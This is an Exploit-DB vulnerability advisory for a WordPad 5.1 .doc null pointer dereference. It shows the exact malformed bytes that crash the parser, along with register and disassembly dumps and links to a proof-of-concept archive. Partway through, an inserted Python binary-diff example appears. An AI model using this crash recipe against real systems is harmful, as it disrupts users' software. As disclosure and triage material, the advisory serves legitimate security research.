Microsoft Wordpad 5.1 – ‘.doc’ Null Pointer Dereference

  • Author: condis
    Date: 2012-05-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/18952/
  • Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability
    Found by condis
    
    Tested on Windows XP SP 3 Professional PL
    MS Wordpad 5.1 (Compilation 2600.xpsp.080413-2111 SP 3)
    
    This is not the same bug as CWE 2009-0259.
    
    $ Binary diff of the template file (a proper empty .doc document) and the malformed file
    (showing only the offset that differs):
    
    0000 1200: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -- template file
    0000 1200: 00 00 00 00 00 00 63 6F 6E 64 00 00 00 00 00 00 -- proof of concept
    
    Actually it (almost) doesn't matter which 4 bytes we put there, as long as they are != 0x00.
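    The row-wise binary diff used above (crash sample vs. known-good template, printing only the rows that differ) is a routine triage step; here is an added example implementing it, not code from the original advisory. The two buffers are constructed stand-ins, not the real template or PoC files, and the offset 0x1206 and bytes "cond" are taken from the diff shown above.

```python
"""Row-wise binary diff in the style of the advisory: report only the
16-byte rows at which two files differ.  Added example; the sample
buffers below are constructed, not the real template/PoC files."""

WIDTH = 16


def diff_rows(a: bytes, b: bytes, width: int = WIDTH):
    """Return [(offset, row_a, row_b)] for every `width`-byte row that differs.
    Files of unequal length are compared up to the longer one, so a row that
    exists in only one file is reported with an empty row for the other."""
    rows = []
    for off in range(0, max(len(a), len(b)), width):
        ra, rb = a[off:off + width], b[off:off + width]
        if ra != rb:
            rows.append((off, ra, rb))
    return rows


def fmt_row(off: int, row: bytes, width: int = WIDTH) -> str:
    """Format one row like the advisory: '0000 1200: 00 00 .. 63 6F 6E 64 ..'."""
    hexpart = " ".join(f"{x:02X}" for x in row).ljust(width * 3 - 1)
    return f"{off >> 16:04X} {off & 0xFFFF:04X}: {hexpart}"


def first_diff_offset(a: bytes, b: bytes) -> int:
    """Exact offset of the first differing byte, or -1 if the files are identical."""
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y:
            return i
    return -1 if len(a) == len(b) else min(len(a), len(b))


if __name__ == "__main__":
    # Constructed stand-ins: an all-zero region, and the same region with the
    # four non-zero bytes "cond" at 0x1206, mirroring the advisory's diff.
    template = bytes(0x1300)
    poc = bytearray(template)
    poc[0x1206:0x120A] = b"cond"
    for off, ra, rb in diff_rows(template, bytes(poc)):
        print(fmt_row(off, ra), "-- template file")
        print(fmt_row(off, rb), "-- proof of concept")
    print(f"first differing byte at 0x{first_diff_offset(template, bytes(poc)):X}")
```

    In practice the two arguments are the bytes of the original document and of the crashing sample; the exact offset reported by first_diff_offset is what you then look for in the parser's control flow.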
    
    Access violation when reading [00000004]
    
    $ Registers:
    
    eax = 020ebb72 ebx = 00000000 ecx = 020ebb7c edx = 00090608 
    esi = 00000000 edi = 01bc04a8 eip = 01b9dbbb esp = 0177f5c8 
    ebp = 0177f5cc 
    
    $ Function dump :
    
    01b9dbb4 55               push    ebp
    01b9dbb5 8bec             mov     ebp,esp
    01b9dbb7 56               push    esi
    01b9dbb8 8b7508           mov     esi,dword ptr [ebp+8]
    01b9dbbb 807e0400         cmp     byte ptr [esi+4],0       ds:0023:00000004=??   ; ---- crash
    01b9dbbf 751b             jne     mswrd8+0x1dbdc (01b9dbdc)
    01b9dbc1 8b06             mov     eax,dword ptr [esi]
    01b9dbc3 57               push    edi
    01b9dbc4 8b78fc           mov     edi,dword ptr [eax-4]
    01b9dbc7 57               push    edi
    01b9dbc8 ff156010b801     call    dword ptr [mswrd8+0x1060 (01b81060)]
    01b9dbce 57               push    edi
    01b9dbcf ff157410b801     call    dword ptr [mswrd8+0x1074 (01b81074)]
    01b9dbd5 56               push    esi
    01b9dbd6 e87bfdffff       call    mswrd8+0x1d956 (01b9d956)
    01b9dbdb 5f               pop     edi
    01b9dbdc 5e               pop     esi
    01b9dbdd 5d               pop     ebp
    
    $ 'O, hai' goes to Echo, Varseand, cxecurity and madcow ;3
    
    $ Below you should see a link to the attachment with the PoC:
    
    http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18952.rar